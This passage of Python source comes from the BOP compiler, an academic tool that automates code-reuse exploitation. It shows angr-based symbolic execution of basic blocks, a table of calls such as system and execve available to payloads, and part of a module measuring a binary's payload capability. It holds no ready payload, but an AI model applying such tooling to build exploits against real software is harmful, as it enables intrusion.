        addr = state.se.eval(state.inspect.mem_read_address)
        # print '=== READ', hex(state.inspect.instruction), hex(addr)

        # check if address is inside .bss or .data sections
        if bss.min_addr  <= addr and addr <= bss.max_addr or \
           data.min_addr <= addr and addr <= data.max_addr:
                # This is also works, but is for Big Endian:
                #       state.memory.make_symbolic('mem', state.inspect.mem_read_address, length)

                # make address symbolic
                symv = state.se.BVS("mem_%x" % addr, state.inspect.mem_read_length << 3)
                
                state.memory.store(state.inspect.mem_read_address, symv, 
                                        state.inspect.mem_read_length, endness=archinfo.Endness.LE)

                # we should read it to update state.inspect.mem_read_expr
                state.memory.load(state.inspect.mem_read_address,
                                        state.inspect.mem_read_length, endness=archinfo.Endness.LE)


        # -------------------------------------------------------------------------------
        # Identifying dereferences is a two stage process. Here (1st step) we capture all
        # memory load information (which happens before the register write) that happen 
        # at this instruction (x64 has 1 distinct memory read per insruction; however 
        # instructions like popad do multiple register writes, but this is not an issue 
        # here).
        # -------------------------------------------------------------------------------
        self.__load[ state.inspect.instruction ] = (
                state.inspect.mem_read_address, 
                state.inspect.mem_read_length, 
                state.inspect.mem_read_expr         # this will be updated
        )

        # associate memory expression with memory address (needed for later on)
        self.__mem2addr[ state.inspect.mem_read_expr.shallow_repr() ] = \
                                (state.inspect.mem_read_address, state.inspect.mem_read_length)
      
        # extract memory symbolic variables
        self.__add_sym_vars( state.inspect.mem_read_address )    

        self.__callback_mutex = 0                   # release lock

   
    # ---------------------------------------------------------------------------------------------
    # __regwrite_callback(): This function is invoked every time that a register write operation
    #       is performed.
    #
    # :Arg state: Current state to write register to
    # :Ret: None.
    #
    def __regwrite_callback( self, state ):
        if self.__callback_mutex == 1:              # if mutex is taken, return
            return

        self.__callback_mutex = 1                   # get lock
        
        try:
            # get register that is being written
            reg = self.__proj.arch.register_names[state.inspect.reg_write_offset]
        except KeyError:                            # just in case
            return


        # TODO: Regwrite only checks writes, but it doesn't check if the previous value perists after
        #       .text:000000000040BCEA         mov     eax, [rbp+ac]
        #       .text:000000000040BCF0         cdqe
        #       .text:000000000040BCF2         shl     rax, 3
        #       .text:000000000040BCF6         mov     rcx, rax
        #       .text:000000000040BCF9         add     rcx, [rbp+nargv]
        # 
        # ('sudo' example)
        #
        # We should add some checks to test whether the regwrite is "mov" or something else


        # print '--------------- ', hex(state.addr), hex(state.inspect.instruction), reg, 
        #                           state.inspect.reg_write_expr


        # remember the "raw" value that is being written to the register
        self.__reg_rawval[ reg ] = state.inspect.reg_write_expr

        if reg not in HARDWARE_REGISTERS:           # we only care about specific registers
            self.__callback_mutex = 0               # release lock
            return        


        # -------------------------------------------------------------------------------
        # This is the 2nd step of the dereference identification process. At this point 
        # we match the instruction that writes a register with the instruction that read
        # from memory. This is because we want to match the memory read expression with
        # the register write.
        # -------------------------------------------------------------------------------
        elif state.inspect.instruction in self.__load:
            addr, length, _ = self.__load[ state.inspect.instruction ]


            # ok we have a dereference!
            deps   = [ ]                            # dependent registers
            symtab = { }

            # find register dependencies on the address (e.g., rsi on <BV64 rsi_44_64 + 0x18>)
            for sym, nam in self.__symreg.iteritems():
                # skip registers that are not symbolic (e.g., rbp)
                if isinstance(sym.args[0], str) and sym.args[0] in addr.shallow_repr():
                    deps.append(nam)
                    symtab[nam] = sym


            # there might be dependencies with constant memory addresses as well (i.e., reading
            # from global variables). Such dependencies are handled during trace searching, so 
            # we ignore them for now. However the register dependencies are needed to check
            # whether a register mapping is valid or not.


            # if "deps" has a single element, we know that a register is containted in "addr"
            # expression. If also that expression has a single node, we know that this will be
            # that register.
            if len(deps) == 1 and len([leaf for leaf in addr.recursive_leaf_asts]) == 1:
                memrd = length
            else:
                memrd = None

            
            # (if basic block has >1 dereferences on the same register, use the most recent one)
            self.regwr[ reg ] = {                   # set data
                'type'  : 'deref',
                'addr'  : addr,
                'deps'  : deps,
                'sym'   : symtab,
                'memrd' : memrd
            }


        # -------------------------------------------------------------------------------
        # The current approach for detecting dereferences is not transitive. Consider the
        # following example:
        #       mov rcx, [rsi + 0x10]
        #       mov rdi, rcx
        #
        # In the 2nd register write, rdi gets an unconstrained symbolic variable (e.g., 
        # <SAO <BV64 Reverse(symbolic_read_unconstrained_17_64)>>) and therefore it's of
        # type 'clob'. However, we want rdi to be treated in the same way with rcx, as
        # they both have the exact same value. Because SE engine gives a unique symbolic
        # variable on every memory cell, we can associate them with their addresses. 
        # Thus, when a register gets a random symbolic value, we can figure out whether
        # it is actually a dereference.
        # -------------------------------------------------------------------------------
        elif state.inspect.reg_write_expr.shallow_repr() in self.__mem2addr:
            addr, length = self.__mem2addr[ state.inspect.reg_write_expr.shallow_repr() ]

            # this code is copy-pasta from above
            deps    = [ ]
            symtab  = { }

            for sym, nam in self.__symreg.iteritems():
                if isinstance(sym.args[0], str) and sym.args[0] in addr.shallow_repr():
                    deps.append(nam)
                    symtab[nam] = sym


            if len(deps) == 1 and len([leaf for leaf in addr.recursive_leaf_asts]) == 1:
                memrd = length
            else:
                memrd = None


            self.regwr[ reg ] = {
                'type'  : 'deref',
                'addr'  : addr,
                'deps'  : deps,
                'sym'   : symtab,
                'memrd' : memrd
            }
            

        # -------------------------------------------------------------------------------

        self.__callback_mutex = 0                   # release lock


    # ---------------------------------------------------------------------------------------------
    # __sig_handler(): Symbolic execution may take forever to complete. To deal with it, we set
    #       an alarm. When the alarm is triggered, this singal handler is invoked and throws an
    #       exception that causes the symbolic execution to halt.
    #
    # :Arg signum: Signal number
    # :Arg frame: Current stack frame
    # :Ret: None.
    #
    def __sig_handler( self, signum, frame ):        
        if signum == signal.SIGALRM:                # we only care about SIGALRM

            # angr may ignore the exception, so let's throw many of them :P
            raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT)
            raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT)
            raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT)
            raise Exception("Alarm triggered after %d seconds" % ABSBLK_TIMEOUT)


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor. This function initializes the environment for the symbolic
    #       execution, it executes the basic block, and performs the abstraction.
    #
    # :Arg project: Instance of angr project
    # :Arg addr: Entry point of the basic block
    # :Ret: None.
    #
    def __init__( self, project, addr ):
        self.__proj  = project                      # we'll need these
        self.__entry = addr

        
        # ---------------------------------------------------------------------
        # initialize abstraction variables
        # ---------------------------------------------------------------------
        self.regwr      = { }                       # all register writes for that block
        self.memrd      = set()                     # all memory reads for that block
        self.memwr      = set()                     # all memory writes for that block
        self.conwr      = set()                     # all concrete memory writes for that block
        self.splmemwr   = [ ]                       # all memory register writes for that block
        self.call       = { }                       # function/system call (if any) for that block
        self.cond       = { }                       # conditional jumps (if any) for that block
        self.symvars    = { }                       # symbolic variables for memory
        self.__load     = { }                       # memory loads (for internal use)
        self.__mem2addr = { }                       # map between memory expressions and addresses

        self.__mem = { }
        self.__reg_rawval = { }

        # ---------------------------------------------------------------------
        # Create a blank state and prepare it for symbolic execution.
        #
        # TODO: Check options again
        # ---------------------------------------------------------------------
        inist = self.__proj.factory.blank_state(    # create a blank state
            addr=addr,                              # set address
            #mode='symbolic', 
            add_options={                           # configure options
                simuvex.o.AVOID_MULTIVALUED_READS,
                simuvex.o.AVOID_MULTIVALUED_WRITES,
                simuvex.o.NO_SYMBOLIC_JUMP_RESOLUTION,
                simuvex.o.CGC_NO_SYMBOLIC_RECEIVE_LENGTH,
                simuvex.o.NO_SYMBOLIC_SYSCALL_RESOLUTION,
                simuvex.o.TRACK_ACTION_HISTORY,
                
                # newly added option
                simuvex.o.SYMBOLIC_INITIAL_VALUES
            },
            remove_options=simuvex.o.resilience_options | simuvex.o.simplification           
        )

        # configure more options (add/remove)
        inist.options.discard(simuvex.o.CGC_ZERO_FILL_UNCONSTRAINED_MEMORY)
        inist.options.update( {
            simuvex.o.TRACK_REGISTER_ACTIONS,
            simuvex.o.TRACK_MEMORY_ACTIONS,
            simuvex.o.TRACK_JMP_ACTIONS,
            simuvex.o.TRACK_CONSTRAINT_ACTIONS }
        )

      
        # ---------------------------------------------------------------------
        # initialize all registers with a symbolic variable
        # ---------------------------------------------------------------------
        inist.regs.rax = inist.se.BVS("rax", 64)    # give convenient names
        inist.regs.rbx = inist.se.BVS("rbx", 64)
        inist.regs.rcx = inist.se.BVS("rcx", 64)
        inist.regs.rdx = inist.se.BVS("rdx", 64)
        inist.regs.rsi = inist.se.BVS("rsi", 64)
        inist.regs.rdi = inist.se.BVS("rdi", 64)


        # rbp may also needed as it's mostly used to access local variables (e.g., 
        # rax = [rbp-0x40]) but some binaries don't use rbp and all references are
        # rsp related. In these cases it may worth to use rbp as well.
        if MAKE_RBP_SYMBOLIC:
            inist.regs.rbp = inist.se.BVS("rbp",64) # keep rbp symbolic
        else:
            inist.registers.store('rbp', FRAMEPTR_BASE_ADDR, size=8, endness=archinfo.Endness.LE)
        
        # rsp must be concrete and properly initialized
        inist.registers.store('rsp', RSP_BASE_ADDR, size=8, endness=archinfo.Endness.LE)

        inist.regs.r8  = inist.se.BVS("r08", 64)
        inist.regs.r9  = inist.se.BVS("r09", 64)
        inist.regs.r10 = inist.se.BVS("r10", 64)
        inist.regs.r11 = inist.se.BVS("r11", 64)
        inist.regs.r12 = inist.se.BVS("r12", 64)
        inist.regs.r13 = inist.se.BVS("r13", 64)
        inist.regs.r14 = inist.se.BVS("r14", 64)
        inist.regs.r15 = inist.se.BVS("r15", 64)


        # ---------------------------------------------------------------------
        # Other initializations
        # ---------------------------------------------------------------------        
        # map symbolic names to registers

        # self.__symreg = { self.__getreg(inist, r):r for r in HARDWARE_REGISTERS }
        self.__symreg = { 
            inist.regs.rax : 'rax',
            inist.regs.rbx : 'rbx',
            inist.regs.rcx : 'rcx',
            inist.regs.rdx : 'rdx',
            inist.regs.rsi : 'rsi',
            inist.regs.rdi : 'rdi',
            inist.regs.rbp : 'rbp',
            inist.regs.rsp : 'rsp',
            inist.regs.r8  : 'r8',
            inist.regs.r9  : 'r9',
            inist.regs.r10 : 'r10',
            inist.regs.r11 : 'r11',
            inist.regs.r12 : 'r12',
            inist.regs.r13 : 'r13',
            inist.regs.r14 : 'r14',
            inist.regs.r15 : 'r15'
        }


        # UPDATE: Don't create a symbolic stack, as this consumes all the Virtual Memory and
        # may crash the machine. By carefully configuring rsp and rbp within the limit of virtual
        # page limit, we can achieve the same effect, so we don't need a symbolic stack.
        #
        # The main issue here are the permissions (stack may not appear as R+W), but as long as
        # both rsp and rbp point in the same page, there is no problem.
        #
        #
        #       # create a symbolic stack (required to have writable pages)
        #       stack = inist.se.BVS("stack", self.__proj.arch.bits * _STACK_SZ)     
        #
        #       # write symbolic stack to memory  
        #       # inist.memory.store(inist.regs.sp, stack, endness=archinfo.Endness.LE)                    
        #       inist.memory.store(STACK_BASE_ADDR, stack, endness=archinfo.Endness.LE)

        # when solver gives up (in milliseconds)
        inist.se._solver.timeout = ABSBLK_TIMEOUT*1000


        # ---------------------------------------------------------------------
        # Hooks for identifying dereferences
        # ---------------------------------------------------------------------
        self.__callback_mutex = 0                   # hooks are enabled

        inist.inspect.b('reg_write', when=angr.BP_BEFORE, action=self.__regwrite_callback)
        inist.inspect.b('mem_read',  when=angr.BP_AFTER,  action=self.__memread_callback)
        
        
        # -------------------------------------------------------------------------
        # Do the symbolic execution (using simulation managers)
        # ------------------------------------------------------------------------- 
        simgr = self.__proj.factory.simulation_manager(thing=inist)
        simgr.save_unconstrained = True             # do not discard unconstrained stashes


        signal.signal(signal.SIGALRM, self.__sig_handler)
        signal.alarm(ABSBLK_TIMEOUT)                  


        # make sure that you execute the normalized block
        # TODO: cleanup
        node = ADDR2NODE[self.__entry]
        num_inst = len(node.instruction_addrs) if node is not None else None
        if num_inst:
           simgr.step(num_inst=num_inst)
        
        else:
            simgr.step()                            # execute 1 basic block
    
        signal.alarm(0)                             # disable alarm


        if simgr.active:                            # check if execution was successful
            newst = simgr.active[0]                 # get the new state (after execution)

        elif simgr.unconstrained:
            # because we execute a single basic block, it's possible to end up in an state that
            # instruction pointer depends on symbolic data and hence to not know how to proceed
            # (i.e., unconstrained stash)
            newst = simgr.unconstrained[0]

        elif simgr.deadended:                       # check if execution can't continue (retq)
            newst = simgr.deadended[0]              # work with what you have
           
        else:                                       # everything else should generate an error
            print simgr.stashes
            raise Exception('There are no usable stashes!')


        # -------------------------------------------------------------------------
        # Analyze results and generate the abstractions
        # ------------------------------------------------------------------------- 
        self.__reg_w(newst)                         # analyze register writes
        self.__mem_r(newst)                         # analyze memory reads
        self.__mem_w(newst)                         # analyze memory writes
        self.__call(newst)                          # analyze function/system calls
        self.__cond(newst)                          # analyze conditional jumps


        # -------------------------------------------------------------------------
        # Apply (any) patches
        #
        # Instructions like 'rep movsq' incorrectly classify rsi and rdi in 'deref'
        # types. This is because angr assigns a basic block with a single rep* 
        # instruction (as VEX IR contains loops). To fix that, we simply mark the
        # used registers as clobbering.
        # ------------------------------------------------------------------------- 
        blk_insns = node.block.capstone.insns       # get block instructions

        if len(blk_insns) == 1 and 'rep' in blk_insns[0].insn.mnemonic:
            # name = blk_insns[0].insn.insn_name()    # get instruction name (w/o the rep*)
              
            # make 'rsi', 'rdi' and 'rcx' clobbering (all of them are modified)
            self.regwr['rdi'] = {'type' : 'clob'}    
            self.regwr['rsi'] = {'type' : 'clob'}
            self.regwr['rcx'] = {'type' : 'clob'}            


        '''
        print
        print '-------------------- Register Writes --------------------'                   
        for a, b in self.regwr.iteritems():
            print a, b

        print '-------------------- Memory Reads --------------------'            
        for a, b in self.memrd:
            print a, b

        print '-------------------- Memory Writes --------------------'            
        for a, b in self.memwr:
            print a, b

        print '-------------------- Concrete Writes --------------------'            
        for a, b in self.conwr:
            print a, b

        print '-------------------- SPL Memory Writes --------------------'            
        for a in self.splmemwr:
            print a

        print '-------------------- Calls --------------------'            
        print self.call

        print '-------------------- Conditional Jumps --------------------'            
        print self.cond
        '''


    # ---------------------------------------------------------------------------------------------
    # __getitem__(): An alternative way to get block "abstractions".  
    #
    # :Arg what: The name of the abstraction that you want to get
    # :Ret: The requested abstraction.
    # 
    def __getitem__( self, what ):
        try:
            return {
                'regwr'    : self.regwr,
                'memrd'    : self.memrd,
                'memwr'    : self.memwr,
                'conwr'    : self.conwr,
                'splmemwr' : self.splmemwr,
                'call'     : self.call,
                'cond'     : self.cond,
                'symvars'  : self.symvars
            }[ what ]
        except KeyError:
            return None                             # abstraction not found


    # ---------------------------------------------------------------------------------------------
    # __iter__(): Iterate over all abstractions. This function is a generator over all possible
    #       abstractions.
    #
    # :Ret: Each time function returns a different tuple (name, abstraction).
    # 
    def __iter__( self ):   
        yield 'regwr',    self.regwr
        yield 'memrd',    self.memrd
        yield 'memwr',    self.memwr
        yield 'conwr',    self.conwr
        yield 'splmemwr', self.splmemwr
        yield 'call',     self.call
        yield 'cond',     self.cond
        yield 'symvars',  self.symvars 


# -------------------------------------------------------------------------------------------------
'''
if __name__ == '__main__':                          # DEBUG ONLY
    import angr

    project = angr.Project('eval/opensshd/sshd', load_options={'auto_load_libs': False})    
    # project.analyses.CFGFast()                    # to prepare project.kb.functions

    # Problem: Inidirect pointers in .bss:
    #   .text:00000000004050B1         mov     rax, cs:public_key
    #   .text:00000000004050B8         mov     rdi, [rax+20h]          ; value
    #
    # abstr = abstract_ng(project, 0x4050B1)

    # abstr = abstract_ng(project, 0x416610)
    abstr = abstract_ng(project, 0x416631)

    # TODO: check me again!
    abstr = abstract_ng(project, 0x0x40c01f)

    for a, b in abstr:
        print '\t', a, b

    print 'done!'
'''
# -------------------------------------------------------------------------------------------------


================================================
FILE: source/calls.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# calls.py
#
# This module contains all declarations for system and library calls that SPL supports. A call is
# declared as a tuple (name, nargs, modregs):
#
#       name    : The library/system call name
#       nargs   : The number of its arguments. Set to INFINITY for variadic functions.
#       modregs : A list of all registers that are modified when the call returns. Note that rax 
#                 is always modified as it has the return value.
#
# To keep the implementation simple, We do not support library calls that take arguments on the
# stack.
#
# Also, it is possible to declare any custom calls that reside in the binary.
# -------------------------------------------------------------------------------------------------
from coreutils import *


# -------------------------------------------------------------------------------------------------
# Calling Conventions
# -------------------------------------------------------------------------------------------------
SYSCALL_CC = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']
LIBCALL_CC = ['rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9']


# -------------------------------------------------------------------------------------------------
# Supported system calls
# -------------------------------------------------------------------------------------------------
syscalls__ = [
    # ssize_t read(int fd, void *buf, size_t count)
    ('read',    3,  ['rax', 'rcx', 'r10', 'r11']),

    # ssize_t write(int fd, const void *buf, size_t count)
    ('write',   3,  ['rax', 'rcx', 'r10', 'r11']),

    # void *sbrk(intptr_t increment)
    ('sbrk',    1,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),

    # int brk(void *addr)
    ('brk',     1,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),

    # int dup(int oldfd)
    ('dup',     1,  ['rax', 'rcx', 'r11']),

    # int dup2(int oldfd, int newfd)
    ('dup2',    2,  ['rax', 'rcx', 'r10', 'r11']),

    # unsigned int alarm(unsigned int seconds)
    ('alarm',   1,  ['rax', 'rcx', 'r10', 'r11']),


    '''
        Feel free to append more syscalls...
    '''
]


# -------------------------------------------------------------------------------------------------
# Supported library calls
# -------------------------------------------------------------------------------------------------
libcalls__ = [
    # int system(const char *command)
    ('system',  1,  ['rax', 'rcx', 'rdx', 'rdi', 'rsi', 'r8', 'r9', 'r10', 'r11']),

    # int puts(const char *s)
    ('puts',    1,  ['rax', 'rcx', 'rdx', 'rdi', 'rsi', 'r8', 'r9', 'r10', 'r11']),

    # int execve(const char *filename, char *const argv[], char *const envp[])
    ('execve',  3,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),

    # int execv(const char *filename, char *const argv[])
    ('execv',   2,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),
    
    # int execl(const char *path, const char *arg, ...);
    ('execl',   2,  ['rax', 'rcx', 'rdx', 'r10', 'r11']),

    # int printf(const char *format, ...)
    ('printf',  INFINITY,  ['rax', 'rcx', 'rdx', 'rsi', 'rdi',  'r8', 'r10', 'r11']),

    # ssize_t send(int sockfd, const void *buf, size_t len, int flags);
    # (we can ignore the 4th parameter for now)
    ('send',    3,  []),

    # void exit(int status)
    ('exit',    1,  []),


    '''
        Feel free to append more libcalls...
    '''
]


# -------------------------------------------------------------------------------------------------
# In case that you don't want to distinguish them
# -------------------------------------------------------------------------------------------------
calls__ = syscalls__ + libcalls__


# -------------------------------------------------------------------------------------------------
# Groups of function calls that have similar effects
# -------------------------------------------------------------------------------------------------
call_groups__ = [
    ['puts',   'printf'],
    ['execve', 'execv', 'execl' ],
]


# -------------------------------------------------------------------------------------------------
# find_syscall(): Search for a specific system call.
#
# :Arg name: Name of the syscall
# :Ret: If system call exists, function returns the associated entry in syscalls__. Otherwise None
#       is returned.
#
def find_syscall( name ):
    call = filter(lambda call: call[0] == name, syscalls__)

    if len(call) == 0:
        return None

    elif len(call) == 1:
        return call[0]

    else:
        raise Exception("System call '%s' has >1 entries in syscalls__ table." % name)


# -------------------------------------------------------------------------------------------------
# find_libcall(): Search for a specific library call.
#
# :Arg name: Name of the library call
# :Ret: If library call exists, function returns the associated entry in libcalls__. Otherwise None
#       is returned.
#
def find_libcall( name ):
    call = filter(lambda call: call[0] == name, libcalls__)

    if len(call) == 0:
        return None

    elif len(call) == 1:
        return call[0]

    else:
        raise Exception("Library call '%s' has >1 entries in libcalls__ table." % name)


# -------------------------------------------------------------------------------------------------
# find_call(): Search for a specific call (either library or system)
#
# :Arg name: Name of the call
# :Ret: If call exists, function returns the associated entry in calls__. Otherwise None is
#       returned.
#
def find_call( name ):
    sys = find_syscall(name)
    lib = find_libcall(name)

    return sys if sys else lib                      # logic OR


# -------------------------------------------------------------------------------------------------


================================================
FILE: source/capability.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# capability.py
#
# This module measures the capability of the program. That is, program's capability gives a good
# indication, on "what the program is capable of executing" in terms of SPL payloads. However, all
# these metrics, aim to identify *upper bounds*; that is, they overestimate the set of SPL programs
# that can be truly executed on this binary.
# -------------------------------------------------------------------------------------------------
from coreutils import *
from calls     import *
import path as P

import networkx as nx
import textwrap
import datetime
import cPickle as pickle
import math
import numpy


# -----------------------------------------------------------------------------
# Capability Options
# -----------------------------------------------------------------------------
CAP_ALL             = 0x00FF                        # all types of statements
CAP_REGSET          = 0x0001                        # register assignments 
CAP_REGMOD          = 0x0002                        # register modifications
CAP_MEMRD           = 0x0004                        # memory reads
CAP_MEMWR           = 0x0008                        # memory writes
CAP_CALL            = 0x0010                        # system and library calls
CAP_COND            = 0x0020                        # conditional statements
CAP_LOAD            = 0x0100                        # load the capability graph from a file
CAP_SAVE            = 0x0200                        # save the capability graph to a file
CAP_NO_EDGE         = 0x0400                        # don't calculate edges in capability graph

# types of analyses
CAP_STMT_COMB_CTR   = 'STMT_COMB_CTR'               # Count combinations of statements
CAP_STMT_MIN_DIST   = 'STMT_MIN_DIST'               # Count min distance between statements
CAP_LOOPS           = 'LOOPS'                       # Analyze loops


# -------------------------------------------------------------------------------------------------
# capability: This class is responsible for performing several measurements in the target binary.
#
class capability( object ):
    ''' ======================================================================================= '''
    '''                                   INTERNAL VARIABLES                                    '''
    ''' ======================================================================================= '''
    __cap = nx.DiGraph()                            # the capability graph (CAP)
    __uid = 0                                       # a unique ID
    

    ''' ======================================================================================= '''
    '''                                   INTERNAL FUNCTIONS                                    '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __add(): Add a node to the capability graph.
    #
    # :Arg addr: Address of the basic block tha contains the statement
    # :Arg ty: Statement type: regset / regmod / call / cond
    # :Arg reg: Register name (for regset/regmod/cond)
    # :Arg val: Statement's value (for regset/regmod/cond)
    # :Arg mode: Statement mode (const/deref for regset and syscall/libcall for call)
    # :Arg isW: A flag indicating whether "val" points to a writable address (for regset)
    # :Arg op: Statement operator (for regmod/cond)
    # :Arg mem: Memory address (for memrd/memwr)
    # :Arg name: Function name (for call)
    # :Ret: None.
    #
    def __add( self, addr, ty, reg=None, val=None, mode=None, isW=None, op=None, name=None, mem=None, size=None ):
        # NOTE: We assume that arguments are not malformed, so we don't do any checks
        cap = {
            'regset' : {'addr':int(addr), 'type':ty, 'reg':reg, 'val':val, '+W':isW, 'mode':mode},
            'regmod' : {'addr':int(addr), 'type':ty, 'reg':reg, 'op':op, 'val':val},
            'memrd'  : {'addr':int(addr), 'type':ty, 'reg':reg, 'mem':mem, 'size':size},
            'memwr'  : {'addr':int(addr), 'type':ty, 'mem':mem, 'val':val, 'size':size},
            'call'   : {'addr':int(addr), 'type':ty, 'name':name, 'mode':mode},
            'cond'   : {'addr':int(addr), 'type':ty, 'reg':reg, 'op':op, 'val':val}
        }[ ty ]                                     # nicely "switch" the appropriate statement
     
        self.__cap.add_node(self.__uid, **cap)      # add statement to the graph
        self.__uid += 1                             # update UID counter


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor. Simply initialize private variables.
    #
    # :Arg cfg: Program's CFG.
    # :Arg name: Program's filename
    #
    def __init__( self, cfg, name ):       
        self.__cfg  = cfg                           # save cfg to internal variables
        self.__name = name                          # program's filename


    # ---------------------------------------------------------------------------------------------
    # build(): Build the Capability Graph. This is a very slow process, so it's possible to save
    #       the graph once its generated, thus without having to re-calculate it the next time.
    #       
    # :Arg options: An integer that describes how the capability graph should be built. It can be
    #       the logical OR of one or more of the following:
    #
    #       CAP_ALL     | Include all types of statements in the graph
    #       CAP_REGSET  | Include register assignments in the graph
    #       CAP_REGMOD  | Include register modifications in the graph
    #       CAP_CALL    | Include system and library calls in the graph
    #       CAP_COND    | Include conditional statements in the graph
    #       CAP_LOAD    | Load the capability graph from a file
    #       CAP_SAVE    | Save the capability graph to a file
    #
    # :Ret: None.
    #
    def build( self, options=CAP_ALL ):
        dbg_prnt(DBG_LVL_1, "Exploring program's capability...")

        # ---------------------------------------------------------------------
        # Load Capability Graph from file ?
        # ---------------------------------------------------------------------       
        if options & CAP_LOAD:
            dbg_prnt(DBG_LVL_1, "Loading the Capability Graph from file...")

            try:
                self.__cap = nx.read_gpickle(self.__name + '.cap')

                dbg_prnt(DBG_LVL_1, "Done.")            

                return                              # your job is done here

            except IOError, err:
                # if you can't load it, simply re-calculate it ;)

                error("Cannot load Capability Graph: %s" % str(err))


        # ---------------------------------------------------------------------
        # Iterate over abstracted basic blocks
        # ---------------------------------------------------------------------       
        dbg_prnt(DBG_LVL_1, "Searching CFG for 'interesting' statements...")

        nnodes  = len(nx.get_node_attributes(self.__cfg.graph, 'abstr').items())
        counter = 1
        
        p = P._cfg_shortest_path(self.__cfg)


        for node, abstr in nx.get_node_attributes(self.__cfg.graph,'abstr').iteritems():
            addr = node.addr

            dbg_prnt(DBG_LVL_3, "Analyzing block at 0x%x (%d/%d)..." % (addr, counter, nnodes))
        

            if options & CAP_REGSET:
                for reg, data in abstr['regwr'].iteritems():

                    if data['type'] == 'concrete':
                        self.__add(addr, ty='regset', reg=reg, val=data['const'], mode='const',
                                         isW=data['writable'])

                    elif data['type'] == 'deref':
                        self.__add(addr, ty='regset', reg=reg, val=data['addr'], mode='deref')
          

            if options & CAP_REGMOD:
                for reg, data in abstr['regwr'].iteritems():
                    if data['type'] == 'mod':                                               
                        self.__add(addr, ty='regmod', reg=reg, op=data['op'], val=data['const'])


            if options & CAP_MEMRD:
                for reg, data in abstr['regwr'].iteritems():
                    if data['type'] == 'deref' and data['memrd']:
                        loadreg = data['deps'][0]

                        self.__add(addr, ty='memrd', reg=reg, mem=loadreg, size=data['memrd'])
        
            
            if options & CAP_MEMWR:
                for memwr in abstr['splmemwr']:
                    self.__add(addr, ty='memwr', mem=memwr['mem'], val=memwr['val'], size=memwr['size'])


            if options & CAP_CALL and abstr['call'] and find_call(abstr['call']['name']):
                self.__add(addr, ty='call', name=abstr['call']['name'], mode=abstr['call']['type'])


            elif options & CAP_COND and abstr['cond']:
            
                # elif because we can't have call and cond at the same basic block
                self.__add(addr, ty='cond', reg=abstr['cond']['reg'], op=abstr['cond']['op'],
                                 val=abstr['cond']['const'])


                '''
                # -----------------------------------------------------------------------
                # hacky way to quickly find a loop
                # -----------------------------------------------------------------------
                for length, loop in p.k_shortest_loops(addr, 0, 10):
                    length, loop = p.shortest_loop(addr)

                    R = abstr['cond']['reg']

                    regmod = 0
                    regset = 0
                    step = 0

                    if length < INFINITY:

                        for l in loop[:-1]:
                            try:
                                X = self.__cfg.graph.node[ADDR2NODE[l]]['abstr']
                            except KeyError:
                                continue
                
                            for reg, data in X['regwr'].iteritems():
                                if data['type'] == 'mod' and reg == R:
                                    regmod += 1
                                    step = data['const']

                                elif reg == R:
                                    regset += 1


                        if regmod == 1 and regset == 0:
                            emph(bolds('GOOD LOOP (%d - %d - %s) %s' % 
                                    (abstr['cond']['const'], step, abstr['cond']['op'], 
                                    pretty_list(loop))))

                        # else:
                        #    print 'BAD LOOP (mod: %d, set: %d) (%d - %d - %s) %s' % \
                        #        (regmod, regset, abstr['cond']['const'], step, abstr['cond']['op'],
                        #        pretty_list(loop))
                '''

            counter += 1                            # update counter

        dbg_prnt(DBG_LVL_1, "Done.")


        # ---------------------------------------------------------------------
        # Show some statistics
        # ---------------------------------------------------------------------       
        emph("Binary has %s interesting statements:" % bold(self.__cap.order()))

